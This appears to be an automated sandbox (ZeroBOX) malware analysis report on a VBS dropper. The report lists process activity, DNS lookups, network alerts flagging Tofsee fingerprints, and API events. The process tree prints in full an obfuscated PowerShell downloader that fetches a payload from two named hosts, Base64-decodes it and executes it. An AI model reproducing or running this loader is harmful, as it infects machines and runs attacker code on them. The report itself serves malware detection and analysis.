Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 30, 2024, 6:07 p.m.	Aug. 30, 2024, 6:17 p.m.

Size	41.9KB
Type	ASCII text, with CRLF line terminators
MD5	`4a3d5b6a6676ea329386a7945756114b`
SHA256	`598a02289faf21f5a1293a4e8e752e7c7c9c65d57363782b77b0578378864cf0`
CRC32	`8E479E37`
ssdeep	`384:gGTZMJWa0ExTb33sDtiU0C8e8XSAAJleoYfrvYPPvTmiJsNMiu3LO:gSaj0Ex3sx/0G8XuleomvYnvKi6u3K`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\IGCupdation.vbs
2548
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;"
  2768
  - cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fristadens.Til && echo t"
    2884

Name	Response	Post-Analysis Lookup
tricotexbacau.ro	A 89.42.218.8	89.42.218.8
jahez.me	A 185.230.210.248	185.230.210.248

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.230.210.248	Active	Moloch
89.42.218.8	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49194 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49194	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49194	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49170 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49171	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49171	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49170	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49170	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49172 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49167	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49167	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49181 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49182	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49182	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49197 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49188 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49198 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49191 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49200 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49200 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49200 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49189 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49200	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49200	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49191	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49191	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49195	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49195	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49201 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49202 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49201	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49201	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49205 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49205 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49174	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49174	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49205	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49205	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49208 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49208 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49208 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49179	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49179	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49208	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49208	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49183	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49183	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49209	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49209	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49184 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49186 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49186 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49186 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49168	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49186	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49168	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49186	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49175 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49190 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49175 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49190 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49175 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49190 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49175	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49190	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49175	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49190	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49192 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49178 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49178	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49178	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49180 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49187 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49187 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49187 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49187	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49187	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 89.42.218.8:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 89.42.218.8:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 89.42.218.8:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 89.42.218.8:443 -> 192.168.56.101:49204	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 89.42.218.8:443 -> 192.168.56.101:49204	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49207 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 185.230.210.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (24 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 30, 2024, 6:07 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 30, 2024, 6:07 p.m.			0	0

Command line console output was observed (50 out of 129 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:28 console_handle: 0x00000053	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType console_handle: 0x0000005f	1	1
